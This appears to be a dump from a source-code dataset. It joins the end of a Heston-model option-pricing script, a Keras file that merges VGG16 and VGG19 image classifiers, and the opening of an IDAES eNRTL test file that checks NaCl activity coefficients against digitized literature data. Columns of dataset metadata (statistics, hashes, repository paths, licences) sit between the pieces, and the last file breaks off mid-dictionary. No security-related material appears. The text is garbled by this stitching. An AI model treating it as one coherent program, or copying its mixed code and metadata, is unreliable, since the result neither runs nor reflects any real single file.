    A = [0.6287965835693049, 0.8796805556963849, 0.9548458991431029, 0.9978807937190832, 1.0432949917908245, 1.0951689975427406, 1.1780329537431, 1.2767467611605525]
    B = [0.846962887118158, 0.5006951388813219, 1.3162296284270554, 0.764281474912235, 1.4312564546785838, 1.0765792448141005, 0.9264392665602718]
    C = [-0.46500629962499923, 4.928351101396242, -6.670948501034147, 8.061184212984527, -4.286695020953507, -0.907309913530479, -1.9936316682418205]
    X = [0.5171192610665245, 0.8894451290344221, 0.972184210805066, 1.013553751690388, 1.05492329257571, 1.0962928334610318, 1.179031915231676, 1.3445100787729636]
    leftSlope = 0.846962887118158
    rightSlope = 0.2666342520834516
    # Spline, 1e-3 penalty (alternative coefficient set, kept for reference)
    # A=[0.6266758553145932, 0.8838690008217314 ,0.9511741483703275, 0.9972169412308787 ,1.045230848712316, 1.0932361943842062, 1.1786839882076958, 1.2767419415280061]
    # B=[0.8329310535215612, 0.5486175716699259, 1.0783076034285555 ,1.1476195823811128 ,1.173600641673776, 1.1472056638621118, 0.918270335988941]
    # C=[-0.38180731761048253, 3.2009663415588276, 0.8377175268235754, 0.31401193651971954 ,-0.31901463307065175, -1.3834775717464938, -1.9682171790586938]
    # X=[0.5171192610665245, 0.8894451290344221, 0.972184210805066, 1.013553751690388, 1.05492329257571, 1.0962928334610318, 1.179031915231676, 1.3445100787729636]
    # leftSlope=0.8329310535215612
    # rightSlope=0.2668764075068484
    # Absorption 0.001 0
    # Heston model parameters
    kappa = 0.35
    theta = 0.321
    sigma = 1.388
    rho = -0.63
    r = 0.0
    q = 0.0
    v0 = 0.133
    T = 0.4986301369863014  # defined before cFunc: the constructor needs it
    cFunc = CollocationFunction(X, A, B, C, leftSlope, rightSlope, T)
    print("S=1 => X=", cFunc.solve(1.0))
    # print("slope left",(cFunc.evaluate(X[0]+1e-7)-cFunc.evaluate(X[0]))/1e-7,leftSlope)
    # print("slope r",(cFunc.evaluate(X[-1]-1e-7)-cFunc.evaluate(X[-1]))/1e-7,rightSlope)
    # Contract parameters
    K = 1.0
    spotArray = [1.0]  # max(s-K) = max(s/K-1)*K
    priceArray = [0.07260310]
    # priceArray = [0.07278065]
    # K=0.7
    # spotArray = [1.0]
    # priceArray = [0.30953450-0.3] #P = C- F-K
    # priceArray = [0.00960629]
    # K=1.4
    # spotArray = [1.0]
    # priceArray = [0.00015184+.4]
    # priceArray = [0.40015225]
    Ms = [8, 12, 16, 24, 32, 48, 64, 96, 128, 192, 256, 512]  # X
    Ls = [8, 12, 16, 24, 32, 48, 64, 96, 128, 192, 256, 512]  # V
    L = 256
    B = 0
    # Ns = [4096,2048,1024, 512, 256, 128, 64, 32, 16, 8 ,4] #timesteps
    N = 64  # timesteps
    for L, M in zip(Ls, Ms):
        # for M in Ms:
        priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma,
                     rho, r, q, T, cFunc, K, B, N, M, L)
class PolyCollocationFunction:
    """Polynomial collocation map g(z) = polyval(coeff, z).

    coeff is in numpy.polyval order (highest-degree coefficient first).

    Fixes vs. original: coeff was a shared mutable class-level list (now
    an instance attribute), and the failure branch of solve() referenced
    undefined names (aa, bb, cc, i, self.X) that would have raised a
    NameError instead of the intended diagnostic exception.
    """

    def __init__(self, coeff):
        self.coeff = coeff

    def evaluate(self, z):
        """Evaluate the polynomial at z."""
        return np.polyval(self.coeff, z)

    def solve(self, strike):
        """Return the first (numerically) real root z of g(z) == strike.

        Raises Exception when the shifted polynomial has no real root.
        """
        shifted = self.coeff.copy()
        shifted[-1] -= strike  # subtract strike from the constant term
        allck = np.roots(shifted)
        # print("allck",allck)
        for ck in allck:
            if abs(ck.imag) < 1e-10:
                return ck.real
        raise Exception("no real roots found", allck, strike, self.coeff)
def pricePolySX5ETime():
    """Time-step convergence study for the polynomial-collocation SX5E case.

    The low-degree coefficient set is the effective one (the degree-7
    set assigned first is immediately overridden), and the final
    K/spotArray/priceArray assignments select the K=1.4 contract.
    """
    coeff = [-0.01969830242950278, 0.9836590390856135, -2.127280418584288, 24.46758278682982, -68.69895549895567, 81.68521250909365, -44.40158377607094, 9.096571378087397]
    coeff = [0.17074678852059158, 0.824747250438463, 0.0071906167596872, 5.6862073468872206e-05]
    coeff.reverse()  # np.polyval expects highest-degree first
    cFunc = PolyCollocationFunction(coeff)
    # print("slope left",(cFunc.evaluate(X[0]+1e-7)-cFunc.evaluate(X[0]))/1e-7,leftSlope)
    # print("slope r",(cFunc.evaluate(X[-1]-1e-7)-cFunc.evaluate(X[-1]))/1e-7,rightSlope)
    # Heston model parameters
    kappa = 0.35
    theta = 0.321
    sigma = 1.388
    rho = -0.63
    r = 0.0
    q = 0.0
    v0 = 0.133
    T = 0.4986301369863014
    # Contract parameters
    K = 1.0
    spotArray = [1.0]  # max(s-K) = max(s/K-1)*K
    priceArray = [0.07211350]
    priceArray = [0.06937973]  # call
    # K=0.7
    # spotArray = [1.0]
    # priceArray = [0.31095779]
    K = 1.4
    spotArray = [1.0]
    priceArray = [0.39934721]
    M = 64
    L = 201  # V
    B = 0
    Ns = [2048, 1024, 512, 256, 128, 64, 32, 16, 8, 4]  # timesteps
    Ns.reverse()  # coarsest first
    for N in Ns:
        priceCallLog(spotArray, priceArray, v0, kappa, theta, sigma,
                     rho, r, q, T, cFunc, K, B, N, M, L)
def main():
    """Entry point: run the SX5E time-convergence experiment.

    Other experiments are kept below for reference, commented out.
    """
    # priceAlbrecherSpace()
    # priceAlbrecherTime()
    # priceBloombergSpace()
    # priceBloombergTime()
    priceSX5ETime()


if __name__ == '__main__':
    main()
| 40.283807
| 817
| 0.515464
| 15,826
| 93,539
| 3.03608
| 0.047074
| 0.020146
| 0.023414
| 0.020479
| 0.886033
| 0.868738
| 0.850049
| 0.826802
| 0.8083
| 0.792316
| 0
| 0.156611
| 0.283101
| 93,539
| 2,321
| 818
| 40.301163
| 0.559918
| 0
| 0
| 0.797059
| 0
| 0
| 0.003321
| 0
| 0
| 0
| 0
| 0.000431
| 0
| 0
| null | null | 0.001176
| 0.006471
| null | null | 0.004118
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3503f7de1e83c0d653621f99c6c9ecc7834297e7
| 13,905
|
py
|
Python
|
iot/Executer/vgg16boostvgg19.py
|
Derfei/MergingandScheduling
|
544612a45a5e7db270f51782f1bb08006e3e348a
|
[
"MIT"
] | 1
|
2021-12-17T17:56:12.000Z
|
2021-12-17T17:56:12.000Z
|
iot/Executer/vgg16boostvgg19.py
|
Derfei/task-merging-and-scheduling-for-deep-learning-applications-in-mobile-edge-computing
|
544612a45a5e7db270f51782f1bb08006e3e348a
|
[
"MIT"
] | null | null | null |
iot/Executer/vgg16boostvgg19.py
|
Derfei/task-merging-and-scheduling-for-deep-learning-applications-in-mobile-edge-computing
|
544612a45a5e7db270f51782f1bb08006e3e348a
|
[
"MIT"
] | 1
|
2021-09-07T01:26:17.000Z
|
2021-09-07T01:26:17.000Z
|
# -*- coding: utf-8 -*-
'''
@author: longxin
@version: 1.0
@date:
@changeVersion:
@changeAuthor:
@description:
'''
class util_vgg16boostvgg19:
    """Helpers that build stock VGG16/VGG19 classifiers with prefixed
    layer names and copy their pretrained ImageNet weights into the
    merged vgg16boostvgg19 model.
    """

    @classmethod
    def get_vgg16model(cls):
        """Build VGG16 (conv layers prefixed '16_') and load its
        pretrained ImageNet weights (matched by layer order).

        Fixes vs. original: Model is created with the 'outputs' keyword
        (the 'output' keyword is rejected by current Keras), and the
        duplicated WEIGHTS_PATH assignment / stray bare string are
        removed.
        """
        from keras.models import Model
        from keras.layers import Flatten
        from keras.layers import Dense
        from keras.layers import Input
        from keras.layers import Conv2D
        from keras.layers import MaxPooling2D
        from keras.utils.data_utils import get_file

        WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
        img_input = Input(shape=(224, 224, 3))
        # Five convolutional blocks: (filters, number of 3x3 conv layers).
        x = img_input
        for block, (filters, n_convs) in enumerate(
                [(64, 2), (128, 2), (256, 3), (512, 3), (512, 3)], start=1):
            for conv in range(1, n_convs + 1):
                x = Conv2D(filters, (3, 3), activation='relu', padding='same',
                           name='16_block%d_conv%d' % (block, conv))(x)
            x = MaxPooling2D((2, 2), strides=(2, 2),
                             name='16_block%d_pool' % block)(x)
        # Classification block
        x = Flatten(name='flatten')(x)
        x = Dense(4096, activation='relu', name='16_fc1')(x)
        x = Dense(4096, activation='relu', name='16_fc2')(x)
        x = Dense(1000, activation='softmax', name='predictions')(x)
        model = Model(inputs=img_input, outputs=x, name='vgg16')
        # Load pretrained ImageNet weights (load_weights matches by order).
        weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels.h5',
                                WEIGHTS_PATH,
                                cache_subdir='models')
        model.load_weights(weights_path)
        return model

    @classmethod
    def get_vgg19model(cls):
        """Build VGG19 (conv layers prefixed '19_') and load its
        pretrained ImageNet weights (matched by layer order).
        """
        from keras.models import Model
        from keras.layers import Flatten
        from keras.layers import Dense
        from keras.layers import Input
        from keras.layers import Conv2D
        from keras.layers import MaxPooling2D
        from keras.utils.data_utils import get_file

        WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg19_weights_tf_dim_ordering_tf_kernels.h5'
        img_input = Input(shape=(224, 224, 3))
        # Five convolutional blocks: (filters, number of 3x3 conv layers).
        x_vgg19 = img_input
        for block, (filters, n_convs) in enumerate(
                [(64, 2), (128, 2), (256, 4), (512, 4), (512, 4)], start=1):
            for conv in range(1, n_convs + 1):
                x_vgg19 = Conv2D(filters, (3, 3), activation='relu', padding='same',
                                 name='19_block%d_conv%d' % (block, conv))(x_vgg19)
            x_vgg19 = MaxPooling2D((2, 2), strides=(2, 2),
                                   name='19_block%d_pool' % block)(x_vgg19)
        # Classification block
        x_vgg19 = Flatten(name='flatten')(x_vgg19)
        x_vgg19 = Dense(4096, activation='relu', name='19_fc1')(x_vgg19)
        x_vgg19 = Dense(4096, activation='relu', name='19_fc2')(x_vgg19)
        x_vgg19 = Dense(1000, activation='softmax', name='19_predictions')(x_vgg19)
        model = Model(inputs=img_input, outputs=x_vgg19)
        weights_path = get_file('vgg19_weights_tf_dim_ordering_tf_kernels.h5',
                                WEIGHTS_PATH,
                                cache_subdir='models')
        model.load_weights(weights_path)
        return model

    @classmethod
    def util_load_vgg16boostvgg19_weight(cls, vgg16_model, vgg19_model, model):
        """Copy weights into *model* layer-by-layer, matching by name
        against the VGG16 model first, then the VGG19 model.

        Layers found in neither source model — or whose weights have an
        incompatible shape — are reported and skipped (get_layer raises
        for unknown names, which the except clause absorbs).
        """
        for layer in model.layers:
            try:
                if vgg16_model.get_layer(layer.name) != None:
                    layer.set_weights(vgg16_model.get_layer(layer.name).get_weights())
                    continue
                if vgg19_model.get_layer(layer.name) != None:
                    layer.set_weights(vgg19_model.get_layer(layer.name).get_weights())
                    continue
            except Exception as e:
                # Best-effort transfer: report and move on.
                print("not find the weight of layer {0} and error is {1}".format(layer.name, e))
class vgg16boostvgg19:
    """Merged classifier: a VGG16 tower ('16_' layer prefix) and a VGG19
    tower ('19_' prefix) share one 224x224x3 input; their softmax class
    scores are summed and passed through a final Dense softmax layer
    named 'predictions'.  The assembled Keras model is exposed as
    self.model.

    Fixes vs. original: the unused WEIGHTS_PATH local and the unused
    get_file import are removed; the repetitive block-building code is
    folded into a helper that produces byte-identical layer names.
    """

    def __init__(self):
        from keras.models import Model
        from keras.layers import Flatten
        from keras.layers import Dense
        from keras.layers import Input
        from keras.layers import Conv2D
        from keras.layers import MaxPooling2D
        from keras import layers

        img_input = Input(shape=(224, 224, 3))

        def conv_tower(prefix, block_spec, tensor):
            # Stack VGG blocks: block_spec lists (filters, n 3x3 convs).
            for block, (filters, n_convs) in enumerate(block_spec, start=1):
                for conv in range(1, n_convs + 1):
                    tensor = Conv2D(filters, (3, 3), activation='relu',
                                    padding='same',
                                    name='%s_block%d_conv%d' % (prefix, block, conv))(tensor)
                tensor = MaxPooling2D((2, 2), strides=(2, 2),
                                      name='%s_block%d_pool' % (prefix, block))(tensor)
            return tensor

        # VGG16 tower
        x = conv_tower('16', [(64, 2), (128, 2), (256, 3), (512, 3), (512, 3)],
                       img_input)
        x = Flatten(name='16_flatten')(x)
        x = Dense(4096, activation='relu', name='16_fc1')(x)
        x = Dense(4096, activation='relu', name='16_fc2')(x)
        x = Dense(1000, activation='softmax', name='16_predictions')(x)

        # VGG19 tower (shares img_input)
        x_vgg19 = conv_tower('19', [(64, 2), (128, 2), (256, 4), (512, 4), (512, 4)],
                             img_input)
        x_vgg19 = Flatten(name='19_flatten')(x_vgg19)
        x_vgg19 = Dense(4096, activation='relu', name='19_fc1')(x_vgg19)
        x_vgg19 = Dense(4096, activation='relu', name='19_fc2')(x_vgg19)
        x_vgg19 = Dense(1000, activation='softmax', name='19_predictions')(x_vgg19)

        # Boost: element-wise sum of the two class-score vectors, then a
        # final trainable softmax layer.
        output = layers.add([x_vgg19, x])
        output = Dense(1000, activation='softmax', name='predictions')(output)
        self.model = Model(inputs=img_input, outputs=output)

    def plot_model(self):
        """Write an architecture diagram to vgg16boostvgg19model.png."""
        from keras.utils import plot_model
        plot_model(self.model, "vgg16boostvgg19model.png",
                   show_layer_names=True, show_shapes=True)
if __name__ == "__main__":
    # Smoke test: compare plain VGG16 against the merged model on one image.
    import numpy as np
    from keras.preprocessing import image
    from keras.applications.imagenet_utils import decode_predictions
    from keras.applications.imagenet_utils import preprocess_input

    # Build the two pretrained source models.
    vgg19_model = util_vgg16boostvgg19.get_vgg19model()
    vgg16_model = util_vgg16boostvgg19.get_vgg16model()

    # Load and preprocess the sample image.
    img_path = 'elephant.jpg'
    img = image.load_img(img_path, target_size=(224, 224))
    x = image.img_to_array(img)
    x = np.expand_dims(x, axis=0)
    x = preprocess_input(x)
    print('Input image shape:', x.shape)

    # Baseline prediction with plain VGG16.
    preds = vgg16_model.predict(x)
    print('Predicted:', decode_predictions(preds))

    # Build the merged model, transfer pretrained weights, and predict.
    tmp = vgg16boostvgg19()
    model = tmp.model
    tmp.plot_model()
    util_vgg16boostvgg19.util_load_vgg16boostvgg19_weight(vgg16_model, vgg19_model, model)
    preds_model = model.predict(x)
    # Fix: report the merged model's prediction — the original printed the
    # VGG16 baseline 'preds' a second time here.
    print('Predicted:', decode_predictions(preds_model))
| 49.483986
| 140
| 0.633729
| 1,948
| 13,905
| 4.314682
| 0.078542
| 0.0721
| 0.082808
| 0.11041
| 0.88483
| 0.869245
| 0.843783
| 0.843783
| 0.820821
| 0.807733
| 0
| 0.107543
| 0.209565
| 13,905
| 280
| 141
| 49.660714
| 0.657174
| 0.027976
| 0
| 0.742268
| 0
| 0.020619
| 0.188311
| 0.008158
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025773
| false
| 0.015464
| 0.185567
| 0
| 0.231959
| 0.020619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1028811116a446d86f3674cadca5dcb53c9dcc2a
| 42,000
|
py
|
Python
|
idaes/generic_models/properties/core/eos/tests/test_enrtl_verification_NaCl.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 112
|
2019-02-11T23:16:36.000Z
|
2022-03-23T20:59:57.000Z
|
idaes/generic_models/properties/core/eos/tests/test_enrtl_verification_NaCl.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 621
|
2019-03-01T14:44:12.000Z
|
2022-03-31T19:49:25.000Z
|
idaes/generic_models/properties/core/eos/tests/test_enrtl_verification_NaCl.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 154
|
2019-02-01T23:46:33.000Z
|
2022-03-23T15:07:10.000Z
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Tests for eNRTL methods
References:
[1] Local Composition Model for Excess Gibbs Energy of Electrolyte Systems, Pt 1.
Chen, C.-C., Britt, H.I., Boston, J.F., Evans, L.B.,
AIChE Journal, 1982, Vol. 28(4), pgs. 588-596
Figures digitized using WebPlotDigitizer, https://apps.automeris.io/wpd/,
May 2021
Author: Andrew Lee
"""
import pytest
from math import exp, log
from pyomo.environ import (ConcreteModel,
Param,
units as pyunits,
value)
from idaes.core import (AqueousPhase,
Solvent,
Apparent,
Anion,
Cation)
from idaes.generic_models.properties.core.eos.enrtl import ENRTL
from idaes.generic_models.properties.core.eos.enrtl_reference_states import \
Unsymmetric
from idaes.generic_models.properties.core.generic.generic_property import (
GenericParameterBlock, StateIndex)
from idaes.generic_models.properties.core.state_definitions import FTPx
from idaes.generic_models.properties.core.pure.electrolyte import \
relative_permittivity_constant
class ConstantVolMol():
    """Pure-component method: constant liquid molar volume (18e-6 m^3/mol).

    Supplies the build_parameters / return_expression pair used by the
    IDAES generic property framework for vol_mol_liq_comp.
    """
    def build_parameters(b):
        # Framework-style callback: 'b' is the component parameter block
        # (not 'self'). Registers the mutable molar-volume Param on it.
        b.vol_mol_pure = Param(initialize=18e-6,
                               units=pyunits.m**3/pyunits.mol,
                               mutable=True)
    def return_expression(b, cobj, T):
        # Molar volume is constant: independent of temperature T.
        return cobj.vol_mol_pure
# Generic property-package configuration for the H2O / NaCl aqueous
# system with the eNRTL equation of state; tau parameters from
# Table 1 of [1].
configuration = {
    "components": {
        # Water solvent with constant molar volume and constant
        # relative permittivity.
        "H2O": {"type": Solvent,
                "vol_mol_liq_comp": ConstantVolMol,
                "relative_permittivity_liq_comp":
                    relative_permittivity_constant,
                "parameter_data": {
                    "mw": (18E-3, pyunits.kg/pyunits.mol),
                    "relative_permittivity_liq_comp": 78.54}},
        # Apparent species NaCl dissociating fully into Na+ and Cl-.
        "NaCl": {"type": Apparent,
                 "dissociation_species": {"Na+": 1, "Cl-": 1},
                 "vol_mol_liq_comp": ConstantVolMol},
        "Na+": {"type": Cation,
                "charge": +1},
        "Cl-": {"type": Anion,
                "charge": -1}},
    "phases": {
        "Liq": {"type": AqueousPhase,
                "equation_of_state": ENRTL}},
    "base_units": {"time": pyunits.s,
                   "length": pyunits.m,
                   "mass": pyunits.kg,
                   "amount": pyunits.mol,
                   "temperature": pyunits.K},
    "state_definition": FTPx,
    "state_components": StateIndex.true,
    "pressure_ref": 1e5,
    "temperature_ref": 300,
    # Binary eNRTL interaction parameters (molecule / ion-pair).
    "parameter_data": {
        "Liq_tau": {
            ("H2O", "Na+, Cl-"): 8.885,  # Table 1, [1]
            ("Na+, Cl-", "H2O"): -4.549}}}  # Table 1, [1]
class TestStateBlockSymmetric(object):
    @pytest.fixture(scope="class")
    def model(self):
        """Class-scoped fixture: a built state block for the NaCl
        eNRTL configuration, with temperature fixed at 298.15 K.
        """
        m = ConcreteModel()
        m.params = GenericParameterBlock(default=configuration)
        m.state = m.params.build_state_block([1])
        # Need to set a value of T for checking expressions later
        m.state[1].temperature.set_value(298.15)
        return m
    @pytest.mark.unit
    def test_parameters(self, model):
        """tau interaction parameters match Table 1 of [1]."""
        assert model.params.Liq.tau["H2O", "Na+, Cl-"].value == 8.885
        assert model.params.Liq.tau["Na+, Cl-", "H2O"].value == -4.549
    @pytest.mark.unit
    def test_log_gamma_h2o(self, model):
        """ln(gamma) of H2O vs. digitized values from Fig 6 of [1].

        For each water mole fraction x the remaining (1-x) is split
        evenly between Na+ and Cl-, and both the true and the apparent
        activity-coefficient expressions are checked against the
        digitized reference value g.
        """
        # start with pure water
        # Using 0 results in division by zero errors
        for k in model.state[1].mole_frac_phase_comp:
            model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
        # Data digitized from Fig 6 [1]: {x_H2O: ln(gamma_H2O)}
        data = {0.0166772823326004: -1.32412227463648,
                0.0368235348413794: -1.29987852737794,
                0.0569697873501583: -1.2756347801194,
                0.0771212007755797: -1.24850091954107,
                0.0972755632962254: -1.21971556563714,
                0.117432874912095: -1.18927871840762,
                0.137590186527965: -1.1588418711781,
                0.157748235417641: -1.12799215061718,
                0.177912182497766: -1.09383944340507,
                0.198075392304084: -1.06009960952436,
                0.218237127562791: -1.02718552230644,
                0.238402549190528: -0.992207068431534,
                0.255813423719564: -0.964639854693858,
                0.315405637317823: -0.854261500929733,
                0.335560737112275: -0.825063273694407,
                0.355727633287624: -0.789259073156702,
                0.375898215832003: -0.751390505962001,
                0.396062900185934: -0.716824925418492,
                0.416232008182701: -0.67978210488659,
                0.436393743441407: -0.646868017668675,
                0.45655990234295: -0.611476690462368,
                0.476725323970687: -0.576498236587459,
                0.496889271050811: -0.542345529375349,
                0.517057641773772: -0.505715582174845,
                0.537221588853897: -0.471562874962733,
                0.557387747755439: -0.436171547756426,
                0.57755243210937: -0.401605967212917,
                0.597715641915689: -0.367866133332205,
                0.617878114448201: -0.334539172782892,
                0.638036900611684: -0.303276578890572,
                0.658196424048972: -0.271601111666854,
                0.678351523843423: -0.242402884431529,
                0.698502199995039: -0.215681897184597,
                0.718656562515684: -0.186896543280671,
                0.7388072386673: -0.160175556033739,
                0.758950542080854: -0.137583302100794,
                0.779093845494409: -0.11499104816785,
                0.799235674360352: -0.0932245408977037,
                0.820938311873743: -0.0746252682763595,
                0.83951122208037: -0.0542331330027968,
                0.887081111079702: -0.0241043023855885,
                0.907200084457657: -0.0151368683888049,
                0.927323481478448: -0.00369219440362834,
                0.947432870296923: -0.0000921137150293738,
                0.967534886377337: -0.0006207663404183,
                0.982152912433448: -0.00191356230614259,
                0.999998: 0}
        for x, g in data.items():
            model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
            model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
                (1-x)/2)
            model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
                (1-x)/2)
            assert pytest.approx(g, rel=4.5e-2, abs=0.01) == value(
                model.state[1].Liq_log_gamma["H2O"])
            assert pytest.approx(g, rel=4.5e-2, abs=0.01) == value(
                model.state[1].Liq_log_gamma_appr["H2O"])
@pytest.mark.unit
def test_log_gamma_pdh(self, model):
    """Validate the long-range (PDH) contribution to the ion activity
    coefficients against data digitized from the literature.

    Na+ and Cl- carry equal and opposite unit charges, so their PDH
    contributions are identical; both are compared to the same data set.
    An OFFSET is added to the digitized values to account for the
    different reference state used by the source figure.
    """
    # start with pure water
    # Using 0 results in division by zero errors
    for k in model.state[1].mole_frac_phase_comp:
        model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
    # Data digitized from Fig 6 [1]
    # Keys are x_H2O, values are the digitized log(gamma_pdh).
    data = {0.0102202097143692: -0.934567107147103,
            0.030381425381713: -0.931468127697603,
            0.0505354137471605: -0.932910302939649,
            0.0706887450851628: -0.934765310426382,
            0.0908453615603908: -0.934556156689684,
            0.110996721816058: -0.937649660910475,
            0.131153995318731: -0.93702767492909,
            0.151309297739069: -0.937644185681764,
            0.171467228269187: -0.936609367455696,
            0.191622530689525: -0.937225878208369,
            0.211781775274533: -0.935365395492927,
            0.231939705804651: -0.934330577266858,
            0.252104863636666: -0.92875460434924,
            0.321728090914091: -0.933511483051937,
            0.34189390577355: -0.927522677889634,
            0.36205840657812: -0.922359537216703,
            0.382220936300354: -0.91843489327783,
            0.402379523857917: -0.916987242807075,
            0.422542053580151: -0.913062598868203,
            0.442695384918153: -0.914917606354935,
            0.462852001393382: -0.914708452618238,
            0.48301124597839: -0.912847969902795,
            0.503172461645734: -0.909748990453295,
            0.523331049203297: -0.908301339982539,
            0.543494892980421: -0.903551031554295,
            0.563651509455649: -0.903341877817597,
            0.583805497821097: -0.904784053059643,
            0.603966713488441: -0.901685073610144,
            0.624131871320455: -0.896109100692527,
            0.644295058070134: -0.891771624508968,
            0.664454302655143: -0.889911141793526,
            0.684614204267596: -0.887637826833398,
            0.704786589401507: -0.877520699224235,
            0.724946491013961: -0.875247384264106,
            0.74511099181853: -0.870084243591175,
            0.765274835595655: -0.865333935162931,
            0.785453133976572: -0.851501317351594,
            0.805626833165373: -0.840558525253058,
            0.827641523255411: -0.824211134895509,
            0.84781883609516: -0.8109977654512,
            0.868006989887754: -0.790972663969571,
            0.888198428817574: -0.768883401264512,
            0.90840235126885: -0.738950325910417,
            0.928616786159249: -0.702411934641345,
            0.948852902955337: -0.652250079297633,
            0.968231171867699: -0.565426968552611,
            0.981271802390295: -0.43102358298104,
            0.994543298706282: -0.295478442814278}
    # Need to correct for different reference state
    OFFSET = 0.971
    for x, g in data.items():
        # Equimolar Na+/Cl- making up the balance of the mixture
        model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
        model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
            (1-x)/2)
        model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
            (1-x)/2)
        assert pytest.approx(g+OFFSET, rel=0.04, abs=0.07) == value(
            model.state[1].Liq_log_gamma_pdh["Na+"])
        assert pytest.approx(g+OFFSET, rel=0.04, abs=0.07) == value(
            model.state[1].Liq_log_gamma_pdh["Cl-"])
@pytest.mark.unit
def test_log_gamma_lc(self, model):
    """Validate the local-composition (lc) contribution to the ion
    activity coefficients against data digitized from the literature.

    An OFFSET is subtracted from the digitized values to account for the
    different reference state used by the source figure.
    """
    # start with pure water
    # Using 0 results in division by zero errors
    for k in model.state[1].mole_frac_phase_comp:
        model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
    # Data digitized from Fig 6 [1]
    # Keys are x_H2O, values are the digitized log(gamma_lc).
    data = {0.00642910940949107: 2.44391469691802,
            0.0261925045768978: 2.42178852215264,
            0.046347839144311: 2.42099343992118,
            0.0665026808921592: 2.41978548440975,
            0.086651608805228: 2.41362304953867,
            0.106801522357427: 2.40828636122754,
            0.126949464631366: 2.40129817979652,
            0.147097406905304: 2.39430999836549,
            0.167250277374893: 2.39145054973418,
            0.187395262731442: 2.38198512862334,
            0.207538276809731: 2.3708682143926,
            0.227685726264105: 2.36346715968161,
            0.24782331932718: 2.3478086393712,
            0.267966826225035: 2.33710459842044,
            0.288102940829415: 2.32020745827011,
            0.308242505170749: 2.30620043107958,
            0.328377141316434: 2.28806467108934,
            0.348510299003425: 2.26869029125919,
            0.36864394950998: 2.24972878470901,
            0.388771193362191: 2.2253999255192,
            0.408894987477447: 2.1981809533696,
            0.429018781592703: 2.17096198122,
            0.449137154692745: 2.13920140299072,
            0.469255527792787: 2.10744082476143,
            0.489368972697179: 2.07155151373244,
            0.509481924782006: 2.03524932942348,
            0.52958649893423: 1.99192829935501,
            0.549690580266888: 1.94819439600656,
            0.569786776486507: 1.89785452017858,
            0.589878537330041: 1.84379878483086,
            0.609963398699666: 1.78396282356355,
            0.630044810332336: 1.72123674933644,
            0.650120800949792: 1.65396906902965,
            0.670193834649858: 1.58422414904303,
            0.690261940154275: 1.5103504962567,
            0.710324624643477: 1.4319352373907,
            0.730382873756595: 1.34980411900495,
            0.750435701854498: 1.26313139453952,
            0.770486065854576: 1.17439430367423,
            0.790531501659005: 1.08152848000924,
            0.807210557418041: 1.01934951372455,
            0.832434963627757: 0.879209621277547,
            0.851556165620075: 0.779608815922458,
            0.869765897827013: 0.683966446828523,
            0.88797129322178: 0.584690792870842,
            0.906174520210461: 0.483598496481289,
            0.9243842524174: 0.387956127387353,
            0.943499737702764: 0.283565991984599,
            0.962618672725083: 0.182065969541643,
            0.98081688527469: 0.0767726875283845,
            0.99266736005891: 0.0264587394852946}
    # Need to correct for different reference state
    OFFSET = 2.414
    for x, g in data.items():
        # Equimolar Na+/Cl- making up the balance of the mixture
        model.state[1].mole_frac_phase_comp["Liq", "H2O"].set_value(x)
        model.state[1].mole_frac_phase_comp["Liq", "Na+"].set_value(
            (1-x)/2)
        model.state[1].mole_frac_phase_comp["Liq", "Cl-"].set_value(
            (1-x)/2)
        assert pytest.approx(g-OFFSET, rel=4e-2, abs=6e-2) == value(
            model.state[1].Liq_log_gamma_lc["Na+"])
        assert pytest.approx(g-OFFSET, rel=4e-2, abs=6e-2) == value(
            model.state[1].Liq_log_gamma_lc["Cl-"])
@pytest.mark.unit
def test_log_gamma(self, model):
    """Validate the total ion activity coefficients (and the apparent
    NaCl activity coefficient) against data digitized from the literature.

    An OFFSET is subtracted from the digitized values to account for the
    different reference state used by the source figure.
    """
    # start with pure water
    # Using 0 results in division by zero errors
    for k in model.state[1].mole_frac_phase_comp:
        model.state[1].mole_frac_phase_comp[k].set_value(1e-12)
    # Data digitized from Fig 6 [1]
    # Keys are x_H2O, values are the digitized log(gamma).
    data = {0.01620941361168171: 1.4776225827856462,
            0.03630284789262042: 1.4722881224536513,
            0.05640439199500977: 1.4714951621340302,
            0.07650593609739911: 1.4707022018144094,
            0.09660453117380643: 1.468257786944834,
